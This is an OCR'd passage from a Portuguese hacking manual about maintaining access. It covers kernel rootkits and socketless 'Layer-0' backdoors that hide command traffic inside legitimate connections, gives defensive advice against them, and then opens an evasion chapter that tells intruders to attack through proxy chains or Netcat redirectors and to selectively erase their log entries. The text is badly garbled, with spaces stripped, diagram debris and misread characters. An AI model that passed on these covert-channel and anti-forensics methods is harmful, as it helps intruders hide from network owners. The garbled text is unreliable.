ParaFreeBSD:AdoreBSD,ipfhack,lbk,THCBackdoor(lkm);
ParaOpenBSD:AdoreBSD,obsd_ipfhack,THCBackdoor(lkm);
ParaWindows9x(vejasó!):BurningChome.
Comoúltimadica,leiaesteswhitepapers:
~www.wOOwOO.org/files/articles/lkmhack.txt;
~packetstormsecurity.nl/docs/hack!LKMHACKlNG.html;
~packetstormsecurity.nl/Win/vxd.txt.
13251
IAtaque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3R I
Comunicacãosemconexões
I
Tudoissoémuitobom,tudoissoémuitobonito,masqualquerservidor -seja
eleHTTP,SMTP,Fingeroumesmoumbackdoorembutidonokernel -precisa
desocketsparaseconectar.Comovimos,umsocketé,grossomodo,umtrio
IP/Porta/Protocolo.Portanto,parameconectaraumserviçoqualquer(um
servidorSSH,porexemplo),tenhodecriarumaconexãoentreomeucliente
SSHeaporta22daqueleservidor.Combackdoorséamesmacoisa:seeu
improviseiumservidorcomNetcat"escutando"naporta9999,precisome
conectaraessaporta(emanteraconexão)parainteragircomele.
Issoquerdizerquemesmoemsistemascomprometidosporrootkitsépossí-
veldescobrirfalcatruasdessetipo.BastarodarumsniffercomooEtherealem
outrocomputadordarede(aestaçãodetrabalhodoadministrador,porexem-
plo)etodasasconexõesespúriaspodemserdetectadas,certo?
Detestodizerisso,masnovamentearespostaénão.Hápelomenosumamanei-
rasconhecida3deesconderotráfegoenãoprecisardeconexãoparatrocarpaco-
tes,quecombinasniffingespoofingcomamanipulaçãodapilhaTCP/IP.
Ouvidosmoucos
Firewallseantivirussãoasestrelasdomomentonotocanteàsegurançaderedes
ecomputadores.Coloca-semuitaféemambososdispositivose,numcomportamen-
tonormalemsereshumanos,relaxa-senosdemaisaspectosdesegurança.Nãoestamos
dizendoquesejamdespesasinúteis,pelocontrário:ftrewallseantiv1fUsmantêm
longedeseussistemasumnúmeroasustador(muitosmilhões)descript-kiddies.Mas
entrecentenasdemilharesdekiddieshádehaverumhackerdeverdade.
Naverdade,nenhumftrewall-sejaeleporsoftwareoupersonificadoemum
hardwarededicado -chegasequerpróximodedeixarqualquermáquinasegura,
casoumhackerdessesapresente-separaoconfrontocomsuaredeouseus
servidores.Penseumpouco:seuftrewalltemde,obrigatoriamente,deixarpassar
osprotocoloseserviçosqueosusuáriosusam.Seosseususuáriossãoautoriza-
dosausarprogramasdeInstantMessenger(ICQ,porexemplo),asportasdo
ICQdevemestarliberadasparatráfegosainteeentrante.Seosseususuários
usamaWorldWideWeb,tráfegoHTTPsaintepelaporta80eentranteporpor-
tasaltasdeve,também,serliberado.
Sónocenárioacima,vemosqueasportas25e80sempreestarãolá,abertaspara
quemquiserusar.Inclusiveparaohackerque,usandotodosostruquesquevimos
emVulnerabilidadesenestescapítulosfinais,podepesquisartodaasuaredeinter-
naeexplorarvulnerabilidadesconhecidasusandoapenasaporta80.Comosediz
comumenteemcírculoscrackers,"aporta80sempreestarálá"...Eoqueocaríssi-
moftrewallpodefazerarespeito,eupergunto?Talvezregistrartodosospacotes
quepassaremporele,parafuturaanálise-semuito.
3.Lembre-se:hámaistécnicasempoderdeclãshackeremantidasemsegredodoqueasmaneiras
divulgadasdesefazeracoisa.Espereefiqueatentoparanovidadesnaáreaembreve!
3261
Ataque,defesaecontra-ataque:Manutenção[

Universidade3°ano
Farejandoproblemas(comunicaçãosemsockets)
Comovimosnocapítuloanterior,podemosfarejararedetodaerecolher
tráfegomesmoquenãosejaendereçadoanós.Autilizaçãomaisóbviadessas
técnicasé,realmente,"escutar"aredeparadescobrirdados,usuários,senhase,
possivelmente,capturarconexões.Masháaindaumnovotruquequepodemos
fazercomsniffers.
Conexõesestabelecidaspormeiodesocketssãomostradascomumasim-
plesconsultaaonetstat. ~
y-.;:;/
Mesmoqueseusistema
D
II
Barramento
daRede
esteJ'aabsurdamente P~rtas
naousadas Ir+::=
trojanizadoecheiode
-------------, 11-
rootkits,asconexões: :
T
CP b1
.
d(
:BackdoorcomSniffer
estaeeClase,
,
mesmotrocasdepaco-
tesUDp,quenãousam
conexões,mas,sim,
usamsockets)podem
sermonitoradasporou-
trasmáquinas.Masese
nãohouverconexão?
Umtrojanoubackdooreosoftwareclienterodandonocomputadordoinva-
sorpodemcomunicar-secomoupormeiodetráfegoespúrio.Ohackerenvia
pacotesTCPouUDPacomputadoresnãoexistentesnarede,masdentroda
faixadeIPsaprovadapeloftrewall.Comonãoéendereçadaaninguém,amensa-
gemmorredentrodaredeenãosefalamaisnoassunto.Sóqueocomputador
comobackdoorsocketless,farejandotudoindiscriminadamente,capturouo
pacotesemdestinoeoprocessou.Simplescomoroubardocedecriança.
Servidordee-mail
ServidordeWEB
t
BROAOCASTou
pacotedestinadoa
IPINEXIXTENTEcom
iII
fragmantodecomando
paraoBACKDOOR
~
:-
HostcomTraian"Promieuo"
,--------,
, '
, ,
, ,
, I
'BACKDDDR
I
, I
, I
'---------'
u ,
Gateway
HostcomTrajan"Pramicuo"
Paraocaminhoinverso,obackdoorutiliza-sedeprogramasjáexistentesno
computadorequejáfazem,pelapróprianatureza,conexõesporsockets.Um
browseréomelhorexemplo.OZéUsuárioabreseuInternetExploreredigita
www.pornoshow.com.ru.Obackdoordetectaaconexãoeinjeta,nomeiodo
tremdedados,umoudoisbytesporpacoteemáreasnasquaisnãovãocausar
problemas(oenchimento,porexemplo,ouofragmentoffsetquandoestenão
13271
IAtaque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3R I
éusado).Dependendo doprotocolousadocomoburrodecarga,épossível
inclusive,colocarmaisdadosnoprópriopayloadIP.OendereçoIPdedestino
nãoéalterado,eoinvasorprecisaestarposicionadonocaminhodaconexão
parafarejarospacoteseextrairdelesosdadosdacomunicação.
Atualizandoacamuflagem
Umsnifferemmodopromíscuo,entretanto,éruidosonumaredeepodeser
facilmentedetectávelcomferramentasespeciais.Masnadaimpedequeumsniffer
sejaexecutadoemmodoexclusivo,farejandoapenasotráfegoqueentraesai.
Nessecaso,ohackernãoenviaparaaredepacotescomIPsinexistentes,massim
direcionadosexatamenteparaamáquinaondeestáobackdoor.Mascomum
detalhe:direcionadosaportasquenãoestejamemuso.
Emumcomputadornormal,apilhaTCP/lPsimplesmenteignorariaosdados
quechegamaportas
inexistentesoudesa-
tivadas.Masemnosso
caso,obackdoorestá
escutandotudooque
chegaemtodaselas.São
virtualmente65mil
portasTCPeoutras65
milUDPqueo
backdooroutrojan
podeusarparaescutar
oquechega,mesmo
queaconexãonãoseja
estabelecida.
Portas ~
Barramento
daRede
Portas
[
,m ----_n:~U_S:das L
:BACKDOOR}
, '
'------------'
+--
I
r
Pacotedestinadoúnicamente
aoHostTrojanizado,com
fragmentodecomandoparao
BACKDOOReescolhendo
aleatoriamenteumaPorta
Ç8
HostcomTroJan"N'o.Promicuo"
Asconexõesnao
saoestabelecidas!
(semSYNIACK)
Muitosdiriamqueissoéimpossível,queexisteaobrigatoriedadedeestabele-
cerumsocketpararecolherdadosdeumaporta.Ledoengando.Ossniffers
comuns(mesmoosmaissimples)estãoaíparaprovarquesepodeescutar
tráfegomesmoquenãosejadirecionadoaoseuMAC!!!Senãohánecessidade
deconexãonoprotocoloEthemet,épossívelrecolherqualquerdadodequal-
querportasemquesejanecessárioconectarsocketsaelas.Essatécnicaécha-
madadeLayer-OListening.
Comoveremosmaisadiante,épossívelcolocarumacamadaadicionalentre
quaisquerduascamadasdapilhaOSI(ouTCP/IP,naprática)emanipulardadoslá.
Essacamadapode,inclusive,ficarnascamadasdemaisbaixonível,oumesmo
entreapilhaeainterfacederedetlsica(daíonomeLayer-O,umavezqueacamada
tlsicaéal).Asferramentasquenormalmenteusamosparadetectar,monitorare
barrarconexõeseV1rtlS
-netstat,nbtstat,firewallseantiv1rtlslocaisetc,etc,etc.-
estãoposicionadosantesdapilhaTCP/lP(ouseja,apilhaficasempreentrea
3281
Ataque,defesaecontra-ataque:Manutençãor

Universidade3°ano
ferramentaearede).Qualquermanipulaçãoouinserçãoquefaçamosnofluxode
dadospoderáserretiradaantesdechegaràsferramentasemquestão.
Portanto,paraqueobackdoorqueusetécnicasdeLayer-Opossaescutara
rede,pelomenosumdostrêsrequisitosabaixodeveserpreenchido:
~OspacotessãoendereçadosaoMACdainterfacederededocomputadorinvadido
~Amensageméumbroadcast,
~Aconexãoéponto-a-ponto,comoporexemploemconexõesdiscadasvia
modem,ISDN/RDSIouxDSLcompppoe.
Apartirdessespré-requisitos,épossívelinteragircomobackdoor/trojan
usandoosseguintesexpedientes:
~Broadcastsemseqüência;
~PacotesICMPemseqüência(ping,DestinationUnreachableeTraceroute);
~Pacotesenviadosaqualquerportadoequipamento
-abertaounão;
~PacotesrejeitadospelapilhaTCP/IPporseremmalformadosou
encapsuladosdeformaequivocada(notequeelestêmdeserperfeitosnas
camadas2e3paraseremroteáveis,oquenosdeixaapenasacamada4...).Os
pacotessãorejeitadospelapilhaTCP/lPmasnãopelotrojan.
Essascoisassãopossíveisdefazerempraticamente100%doscasos,nasredes
modernasbaseadasemEthernet(ouPPP/SUP)eTCP/lP.Estima-sequepelome-
nosumaplicativobemconhecidoseutilizedessastécnicas:otãofaladoMagic
Lantern/Carnivore,dogovernodosEstadosUnidos,usadoparamonitorarotrá-
fegonaInternetàprocuradeterroristas,pedóftlosehackersdeplantão.
Layer-o:comofunciona
Todasasinformaçõesaquireproduzidasforamobtidasnosforunsabertosdo
trojanforge.netAmaioriadelasfoipostadaporM3du54,ummembrodogrupotrojanner
britânicoDaVinci.Essegrupofoioresponsável,em1999,pelodesenvolvimentodo
trojanLSPTheMiniBaugediversosoutrosbaseadosemVxDs,portantotodaateoria
aquidescritajáfoicolocadaempráticapelomenosemprovasdeconceito.
Voltemosaoskernelrootkits.Comeles,podemosadicionardrivers,funciona-
lidadeeproblemasemmodokernelaossistemasoperacionais.Podemos,inclu-
sive,brincarcomapilhaTCP/lPeadicionarcamadasdebaixonívelentreelas.
Portanto,simplesLKMsnosUnixepatchesnoWindowspodemadicionarao
sistemafuncionalidadesLayer-O.
TomandooWindows9xcomoexemplo,épossívelcriarumVxD(releiao
capítulosobreplataformasWindows)queimplementeessacamada.Umftrewall
local(comooZoneAlarm,oBlackIceouoTinyFirewall,porexemplo)trabalha
nolado"dedentro"damáquina,depoisqueosdadosjápassaramportodaa
pilhaderede.Sehouveralgumpacoteoucomunicaçãomaliciosaocorrendo,o
ftrewallnuncasaberá.Acamadaextraadicionadaextrairáosdadospertinen-
tesàconexãodohackereospassará
-porcomunicaçãointerprocessose
pulandotodaaestruturaTCP/lP
-paraobackdooroutrojan.
13291
]Ataque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3RI
UmasimplesDLLqueex-
porteumaSPI(Service
ProviderInterface)tanto
paraascamadassuperiores
(TCPoumesmodeaplica-
ção)quantoparaasdemais
baixonível(acamada
EthernetouPPp,porexem-
pIo)podeintermediaraco-
municaçãoe"pular"ostack
TCP/IP.EssaDLLpoderia
usarparasiticamenteportas
decomunicação-ouseja,
aproveitá-Iasestandoelasemusoounão,enãoconectarsocketscasonãoestejam
-etambémgerarportas-fantasmasquenãosãomostradasemferramentascomo
oNetstatouoEthereal.Ou,pelocontrário:essasportas-fantasmaspoderiamestar
mostrandotráfegofalso,mas"benigno",confundindooadministradordequeestá
tudobem.Oumaismalvadoainda:apresentarparaosaplicativostráfegoderede
comosendolocal(inter-processos)edesviartráfegolocaloriginadoporaplicativos
paraaredeenãoparaosprocessosaquesedestinam.Nocaminhocontrário,a
DLLpoderiainjetaracomunicaçãoderespostaaohackernofluxodedadosdeum
aplicativoexistente,reconhecidoeautorizado-seubrowserpadrão,porexem-
plo,ouaqueleprograminhademensagensinstantâneas.
Masháumamaneiramais
ultrajanteainda
-emais
eficiente.Atéagoranão
havíamoschegadoauma
implementaçãoLayer-Over-
,muuuum,dadeira.Mastranscenden-
.L~~~~~~~~-jdooTCPIIP,pode-se"plan-
tar"aDLLemumacamada
omaisbaixopossívelna
pilhaderede
-abaixoaté
(ouimediatamenteantes,
dependendodocaso)do
Ethernet,doPPP/SLIPoumesmodecoisasmaisespecíficascomoFrameRelay
ouX.25.Umaconexãodessasnuncaserámostradaemqualquersnifferou
pelonetstat,nuncaserádetectadapelofirewalllocalbaseadoemsoftware
(ZoneAlarm,BlackIceetc...)eprovavelmentepassarápelofirewall/gateway
externopoisusaráconexõesválidascomo"laranjas".Qualquerauditoriano
registrodepacotes(vocêcostumalerregularmenteoslogsdoseufirewall,
nãoémesmo?)mostraráapenaspacotesoriginadospelosaplicativoscomuns
-seubrowser,clientedee-mail,MSNMessenger...
~
330I
Ataque,defesaecontra-ataque:Manutenção [
Rede,«
Extra
u--u- -------------,
---:c-.- ~AC~DDD_R--
Retiracomandose
devolvepacoteTCP"Limpo"
IP
Ethernet
«
Rede
«

Universidade3°ano
ParaapilhaTCPIIP,obackdoor/
trojanestádoladodeforadocom-
putadorinvadido,portantoapilhanão
oconseguevere,portanto,ossoftware
firewallsnãoconseguemdetectar.Por
outrolado,aindaéumprogramaro-
dandonocomputador,possivelmente
emkemelmodee,comacesso(porco-
municaçãointerprocessos)aqualquer
outroprogramadamáquina.Issofaz
comqueliteralmentetodasasportasdoseusistemaestejamaoserviçodobackdoor/
trojan,equalquerregistrodofirewallvaimostrarconexõeslegítimasderede.Mais
ainda-épossívelinterceptarqualquerchamadaaqualquerAPI(dokemeloude
programas)eacessosadiscoeilltrá-Ios,remapeá-Iosouretomarumamentira.É
possívelinclusiveenganarIDSscomatécnica.Nojentoeeficaz!
PesquisesobreomodelodereferênciaOSI,noMSDN(msdn.microsoft.com)
enoTechNet(www.microsoft.com/technet)parasabermaissobreVxDse
sobreaestruturaLSP/NPI/TPI/SPIdapilhaderedeMicrosoft.Obviamente,
paraentenderoqueestánessesrecursossãonecessáriosconhecimentosmo-
deradosdeprogramaçãodebaixonível-nadadeDelphiouVisualBasic
-na
plataformaWindows,especialmentesetiveracessoaumaassinaturadoDLL
DeveloperKit(DDK)oudoSoftwareDevelopmentKit(SDK).Paraqualquer
outraplataforma(Unix,VAX/VMS,Novell,AS/400,Macintosh,IBMS/390...),o
raciocínioeastécnicassãoexatamenteasmesmas.
Inrface/Aplicativo
TCP
IP
Ethernet
Extra
DriverdaPlaca
,
;BACKDOOR:
~, ,
~--------------
DefesaeContra-ataque
Defender-sedasameaçasmostradasnestecapítulonãoémuitofácil.Hátrojans
que,mesmosendofacilmentedetectáveis,sãoextremamentedifíceisoumesmo
impossíveisdeseremremovidos.Naexperiênciadosautores,houvepelomenos
duassituações(umWmdows98SEeumWmdows2000)emquenemarecupera-
çãodaimagemoriginaldeinstalação,distribuídanosCDsquevieramjuntocomo
computador,removeuotrojan.Houveanecessidadederefazeraspartições(apa-
gamentoecriação)eformatarodiscorígido,alémdeusarumaferramentade
apagamentototalpararemoverquaisquertraçosdosoftwaremalicioso.
Emalgunscasos,épossívelmonitorarasconexõese,umavezdetectadaa
presençadoinvasor,rastreá-Iasatésechegaraoculpado.Nãohesiteemcontar
comapolíciaecomumbomtimedeadvogadoscasoalgumaaçãodohacker
maliciosopossaserenquadradacomocrime.
Backdoors,VíruseCavaLosdeTróia
Apesardeseremtodossoftwarescomaplicaçõesdiferentes,aprofilaxiaeo
remédioparaelesé,basicamente,amesma,umavezqueasformasdecontágio
eosmétodosparadetecçãoeeliminaçãosãoparecidos.
1331I
IAtaque,defesaecontra-ataque:Manute~

IUniversidadeH4CK3RI
Antesdemaisnada(ou,comodiriaumcompanheirodesoftwarelivre,em
"zerézimo"lugar),eduque-seeeduqueseusfuncionáriosoufamiliaresquanto
apráticassegurasdeutilizaçãoderecursosdeinformáticaenavegaçãona
Internet.Issoincluiosfamososbordõesqueasmamãesnosdisseramavida
toda(edizematémorrer):nãoaceitebalinhadeestranhosenãoaceitebali-
nhasestranhasdepessoasconhecidas.Cuidadocomasdrogas(Le.Coisasque
vocêsabequesãoperigosas)emuitocuidadoquandoandaremlocaisermos,
poucoiluminadosoususpeitos.SãoconselhossábiostambémparaaInternete
paraasredescorporativas.É,mamãetinharazão...
Éóbvioqueousuáriocomumnãotemcomosabersealgumprogramaé
nocivooufoiadulterado,ouseaquelesitecontémcódigomalicioso,ouseo
documentointernodaempresa(e,portanto,oficialeautorizado)emformato
.DOCcontémalgumvírusdemacro...Masumpoucodecuidadoealguma
paranóiapodelivrarmacacovelhodeváriascumbucas.
Quantoaoscuidadospuramentetecnológicosquepodemserimplementados,
emprimeirolugartenhasempreantivírusefirewallslocais(baseadosem
software)atualizados.Sim,euseu,láatráseudisseque,casooatacante(ouo
vírus)fosserealmentebom,essasferramentasnãoiriamservirparanada.En-
tretanto,seremos"visitados"muitomaispormolequestentandobrincarde
"r4qu3r"doqueporbandidosdigitaiscomalgumprofissionalismo.
Portanto,firewallslocaiscomooZoneAlarm,BlackIceouoTinyFirewallajudam
muitoamanteralegiãodekiddieslongedeseuscomputadores.Aomesmotempo,
umbomfirewallderack(comooCiscoPIX)ouimplementadocomumUnix
(velhos386comLinuxouOpenBSDdãoexcelentesfirewalls),comregrasde
filtrageme,depreferência,comconexõesviaproxy,tambémajudaabarraros
lammers.Sugerimosimplementar,sejaemcasaouemumaredecorporativa,am-
bosostiposdefirewall:local(porsoftware)enopontodeconexão(porhardware).
Damesmaformao,antivírusdevemserusadosparabarrarosvírusconheci-
dos.Mesmoqueosantivírusnãodetenhamumapequenapartedosvirusco-
nhecidosepraticamentetodososdesconhecidos,seuusoéobrigatório.Nãoé
porqueestágripadoenãoháremédioparaissoquevocêirádeixardetomar
umanalgésicoparaadordecabeça.
Umoutropontoimportanteaserobservadoé:conheçaosoftwarequeestá
instaladoemseucomputador.Écomum,emcasa,quebaixemoseinstalemos
qualquerbobagembacanaqueencontremosnaInternetouquevenhaemre-
vistascomCDs.Talpráticadeveserevitadaemcomputadoresdomésticose
terminantementeproibidaemcomputadorescorporativos.Conhecendoos
softwaresinstaladosnocomputador,ficaráfácil(emalgunscasos
-noutros
não...)denotaralgumacoisaestranharodandonamáquina.
Umterceiroitemobrigatóriodesegurançaéaadoçãodepolíticasdeusuá-
rioseadministração.Asestaçõesdetrabalhoemempresasdevemempregar
softwaresesistemasoperacionaisquepermitamumcontroletotalporparte
13321
Ataque,defesaecontra-ataque:Manutenção[

Universidade30ano
dosadministradores,equerestrinjamaomáximooqueousuáriocomumpode
fazer.Issoincluibloquearainstalaçãodeprogramaseacessoaáreasnãoauto-
rizadasdocomputador(comoodiretórioC\WINDOWSouoIbinemmáqui-
nasUnix).HáempresasqueusamMacintoshescomMacOSX,ouWindows
NT/2k/XP,oumesmoalgumUnixparaPCscomooFreeBSDouoLinux.A
escolhaécorretíssima,poisessessistemaspermitemmontarpolíticasdedirei-
tossobreocomputadoreimpedirqueosusuários(oualgumvírusoucavalo
detróia)instalemsoftwarenãoautorizadonamáquina.Masdenadaadianta
colocarumWindowsXPProfessionalcomoestaçãodetrabalhoenãoconfigurá-
10parasegurança,deixando-ocomasopçõespadrão.Deve-sefazerasintonia
fmaeretirardousuáriocomumtodasaspermissõesdeacessoquepossivel-
mentesejamdanosasparaaestaçãoeparaarede.
Mesmoemcasa,osusuáriosdomésticosdoWindowsNT/2k/XPeMacOS
devemcriarcontasdeusuáriosemmuitaspermissõeseefetivamenteusar
essascontasnodia-a-dia!!!Deixeacontadoadministradorapenasparaad-
ministraçãoeinstalaçãodeprogramas.Omesmovaleparaosjánãotãopou-
cosusuáriosdomésticosdeLinux.OLinux(equalquerUnix)jávem"defábri-
ca"comesseesquemadeusuáriosepermissões.Mas(sempretemummas)os
usuáriossempre"dãoumjeito"desubverteresseesquemaecomprometera
segurança.Coisascomosubverterousodoosudoouoperarcomousuário
root(omaiorsacrilégiodetodos)sãomuitocomuns.
Sevocêfoiinfectado,nãousequalquerferramentasdedesinfecçãoquenão
sejadeprodutoresidôneos.Baixarumaferramentadeumlocalsuspeitoque
prometeretiraroSub7doseucomputadoréloucura.Elepodetantofazero
quepromete,comoremoveroSub7einstalaroutrobackdoor,ouainda
"patchear"oSub7paraqueseuantivírusnãoodetecte-maselecontinualá.
Quantoaosrootldts,umagrandemaneiradeevitá-losénuncadeixarum
usuáriocompoderessuficientesparachegaràspartescríticasdosistema.Um
rootkitprecisaserinstalado.Mesmoqueainstalaçãosejaautomática,elesem-
prerodaránocontextodousuário.Deixarosusuárioscomníveismínimosde
acessopodedificultarainstalaçãoeaçãodosrootkits.Alémdisso,aconta
Administradorourootdeveserobservadaeguardadaasetechaves.Senhas
difíceisdequebraroumesmodeadivinharsãoobrigatórias.Aplicativosque
nãorodemcomoroot/Admin(nunca!)eportantoisolandoacontaprincipal
dequalquerbufferoverflowtambémsãoimportantíssimos.
Mesmosistemasbemprotegidos,atualizadoseconfiguradospossuemfalhas.Por-
tanto,épossívelqueumdiaalgumhackerconsigaacessoprivilegiadoaseusistema.
Paradetectardesviosdeconfiguraçãoeinstalaçãoderootkits,instaleIDSseprogra-
masdeinventáriodeintegridadedearquivos-Tripwire(www.tripwire.com)e
AIDE(wwwcs.tut.fi/-rammer/aide.html)sãoosmaisconhecidos.Verifiqueasassi-
naturasdetodososprogramasinstaladoseaintegridadedosarquivosdeconfigura-
ção.Todososdesenvolvedoresdesoftwaremodernospossuembancosdedados
comasassinaturasMD5deseusexecutáveiscríticos.
13331
Ataque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3R I
Quantoarootkitsbaseadosemkernel,emprimeirolugar,nãodeixequecheguem
aoseunúcleo!Paracomeçar,seoseusistemapennitir(esevocênãousarnenhum
móduloimportante),desabiliteaopçãodecarregarLKMs.Vaipouparmuitasdores
decabeça.Seforocasoe,sepossível,recompileseukerneloupeçaparaseuforne-
cedorfazê-Io.UmkernelimuneaLKMscertamenteestaráimunearootkitsLKM.
NocasodosWindows(mesmodafamíliaWinNT),quenãopossuemumesque-
maformaldeLKMs,aúnicamaneiradeevitarkernelrootkitséimpedirqueos
arquivossensíveispossamseralteradosporqualquerusuário,alémdecuidar
paramanterasenhadoAdministradoremsegurança.Umtruquemuitousadoé
deixaracontachamadaAdministradorcomumasenhadifícilmassemdireito
algumsobreosistema,eassimcriarumdespisteparainvasores.Cria-se,então,
outraconta,comoutronomeeumasenhaigualmentedifícil,eesteusuárioserá
oadministradordefato.EdesabiliteosuporteaLanManager.
NotequeépossívelsimularaimplementaçãodeLKMsnoWmdowspormeiode
VxDs(releiaocapítulosobrePlataformasWmdows)e,portanto,oacessoàpasta
C\WINDOWSouC\WINNTdeveserbloqueadoatodocustoparausuárioscomuns.
Umamaneiradeverificarosdiscosrígidosàprocuraderootkits(sejambasea-
dosemkernelounão)éretirá-Ioseintalá-Iosemumamáquinasã,semdireitode
execuçãodeprogramas.OsHDsserãoconsideradoscomodrivesdedadosno
sistemadetestes,ecomonãosãookerneleosprogramasinfectadosqueestão
rodando,esimosdamáquinaconfiável,todososarquivosealteraçõesdosrootkits
ficarãoaparentesepassíveisdeverificação.Paraverificarseumrootkitestá
farejandoarede,rode,vocêmesmo,umsniffercomooEthereal.Verifiqueos
modosdeoperaçãodaplacaderede.Se,mesmocomosniffer,ainterfacenão
apareceremmodopromíscuo,umrootkitseguramenteoestácamuflando.
Emúltimocaso,nãoaproveitenadadeumsistemacomprometido.Faça
backupdosdados(eapenasdosdados,nãodaconfiguração!!!)ereformate
completamenteosistema,reinstalando-odozero.Nãoesqueçadeconfigurá-Io
eatualizá-Iocompletamenteantesdeocolocaremprodução,casocontrárioo
invasorpodeentrarnovamentepelomesmoburacodeantes.Guardeumacó-
piadoHDcomprometidoparafuturaanáliseeinvestigaçãodoataque.Sepos-
sível,guardeoHDoriginalecoloqueumnovonolugar.Épossívelqueoinva-
sortenhadeslizadoemapenasumdetalheínfimo,masessedetalhe,sedesco-
berto,podelevaràsualocalizaçãoe,sealeipermitir,asuaprisão.
Umaúltimadica:Echolot(echolot.sourceforge.net).
Comunicaçãosemconexões
Enveredamosemterrenopantanosoporaqui.Todasasrecomendaçõesaci-
masãoimportanteseobrigatórias,masnãofreiam,deformaalguma,especia-
listasdeverdadequequeirampenetraremseussistemas.
Nãohánenhumprogramacomercialquedesempenheoufaciliteasfimçõesabaixo.
Amaioria,entretanto,épossíveldefazerapenascomasprópriasconfiguraçõesde
sistemaoperadonal,semferramentasexternas.Observequesãomedidasextremase
13341
Ataque,defesaecontra-ataque:Manutenção[

Universidade3°ano
quepodemservistascomoparanóiaoumesmobobagemporadministradoresexpe-
rientes.MasPOdemserlevadasacabocasoseprecisedesegurançamáxima.
Emprimeirolugar,deve-seaplicartodaacartilhaefazeraconfiguraçãode
segurançanormalquetodosistemadeveter.Issoépré-requisito.
Depois,deve-serestringiroacessoàpilhaTCP/lP(emcadamáquinadarede!).
Apenasprogramasautorizadospodemteracessoàpilha,emesmoosautoriza-
dosdevemserverificadosquantoàsuaassinaturaMD5.Qualquerdesviodeve
serbloqueadoeinformadoaoadministrador.
Nocasodeservidores,cadaumdosprogramasdeveserexecutadocomum
usuáriodiferente,ecadausuáriodessesdeveteracessoaumconjuntodiferentede
diretórios,arquivos,bibliotecas,numambienteque,emUnix,chama-sechrooted.
Mesmoodiretóriotemporário(jtmpouC\WINDOWS\TEMP)deveserdividido
porprocesso(jtmp/apache,/tmp/sendmail,/tmp/popd,/tmp/tripwire,etc.)ecom
.permissõesdeescritasomenteparaousuáriocorrespondente.Dessaforma,mes-
moqueumafalhasejadescobertaeexploradaemumdosaplicativos,eleestará
confmadoemseuambientepróprioenãodaráacessoaoutraspartesdosistema.
Depois,bloqueia-seoacessoatodasasbibliotecasecria-seimagensseparadas
delasparaaplicativo
-erestritas!Porexemplo,emumamáquinaWinNTpode-se
bloquearcompletamentetodasasDLLsdosistemaedepoiscriarimagenscom
RUNASparacadausuário(que,comovimos,representaumúnicoprograma).
Porúltimo,umaidéiaémontartodasasLANsinternascomoVPNscriptografadas
porPGP(ououtroformatoqualquer).Alémdebloqueartráfegovindodefora
(porquenãobatecomacriptografiaeaschavesusadas),épossívelconceber
políticasdeacessofortementeprotegidas.Apenasusuáriosemáquinascoma
chavecorretapodemacessardeterminadosrecursos
-édificílimocontornartal
esquema.Apenasosservidoresexternos(comoseuservidorWeb)ficarãoforada
VPNeaceitarãoconexõesTCP/lPnãocriptografadas.
E,novamente,relembramos:afamíliaWin9xnãofoidesenvolvidaparaser
clientederede.ApilhaTCP/lPetodaafuncionalidade5MBfoienxertadade-
pois.Portanto,nuncaespereconfiabilidadeesegurançadelas.Emumarede
corporativasegura,nemasestaçõespodemserWindows95/98/Me.Evite-as.
SeforrealmenteprecisousarWindowscomoestaçãodetrabalhoouservidor,
usesempreWindows2000ousuperior.
Estamosquaselá...
Jávimoscomoobservar,traçarnossoplano,atacaremanteroataque.Falta-
nos,agora,escondernossosrastros.Oproximocapítulotratarádisso.Masan-
tesdecontinuar,umapergunta:vocêestárealmentefazendoasexperiências
ousimplesmentelendoolivrocomoaumromance?Exortamo-Iofirmementea
fazertodasasexperiências,desdeosprimeiroscapítulos.Casonãoastenha
feito,volteaoprincípioecomecedenovo.
':4.liçãojásabemosdecor.Sónosrestaaprender...",BetoGuedeseRonaldoBastos.
1335I
IAtaque,defesaecontra-ataque:Manutenção

Ataque,defesae
contra-ataque:
Evasão
Emdiadevitória,ninguémficacansado"
Provérbioárabe

IUniversidadeH4CK3R I
Nãoimportaseoobjetivodoataquesejacausarrebuliçoouobtersecretamente
algumproveito:qualqueratacantequeseprezenãodesejaserrastreadoe
muitomenosapanhado.Algunsdetalhesdevemserobservadosparaque,de-
poisdeumainvasãodotipo"obradearte",adeterminaçãodoculpadoseja
impossíveloumuitodifícil.
Nocapítuloanterior,quandofalamosemrootkits,vimosqueelespodem
esconderumsem-númerodedetalhese,assim,mascararapresençaeaaçãodo
hackernocomputadoratacado.Entretanto,seguro,morreudevelhoe,comou
semrootkits,éaltamentedesejávelqueoinvasortomeprovidênciasparaapa-
gartodososrastrosevestígiosdesuapassagempelosistema.Emváriasplata-
formasháferramentasqueofazemautomaticamente,masentenderosmeca-
nismosderegistroémuitoimportanteparaconferiraeficáciadessasmesmas
ferramentasouparafazertudo"namão",nafaltadelas.
Outrodetalheparaoqualoinvasordeveestaratentoéacamuflagemdos
canaisdecomuicaçãoentreeleeamáquinainvadida.Comovimosnocapítulo
anterior,hámaneirasdetornarinvisívelofluxodedadosdeumbackdoorou
cavalodetróia,simplesmenteescondendoosbytessendotransmitidos/recebi-
dosemconexõesválidas.Nestecapítulo,veremosmaisalgumasmaneirasde
fazeressasconexõesinvisíveis.
Antesdefalarmosemevasão,lembre-sedequeodisfarceanterioraoataque
éimportante.Sevocêpretendeinvadiralguém,lembre-sedeusaralgumtipo
despoofmgantes,como,porexemplo,cadeiasdeproxiespúblicosoumáqui-
nas-IaranjarodandoredirecionadoresNetcat.UsarseupróprioIPparamirar
emalguéméburrice.
obásico:apagandooslogs
Mesmokiddiesmuitoruinssabemquedevemapagarseusrastrosnosregis-
trosdosistema.Aprimeiracoisaquesetemdesaberé,então,ondeestãotais
registros.Umavezcomacessoaeles,deve-setersempreemmentequenãose
podeapagá-Iostodos,casocontrárioserãolevantadasmuitassuspeitassobre
osistema.Apagueapenasoquehouversidocausadopelassuasandançasem
terrenoalheio.Ecuidado:algunssistemaspossuemIDSs,outrosverificadores
deintegridadedearquivos,ealguns,ainda,possuemlogsemlocaisnão-padrão,
deixandologsfalsosnolocalpadrãoparaenganarinvasoresdemeia-tigela.
Lembre-se:verifiquelinhaporlinha,umarquivoporvez,todososarquivosde
logoProcureporcópiasdelesemlocaisnãoóbviosdosistemae,senotarque
estáemumhoneypotl,fuja!
1.Comovimosemcapítulosanteriores,honeypotssãosistemasintencionalmentedeixadoscomo"boi
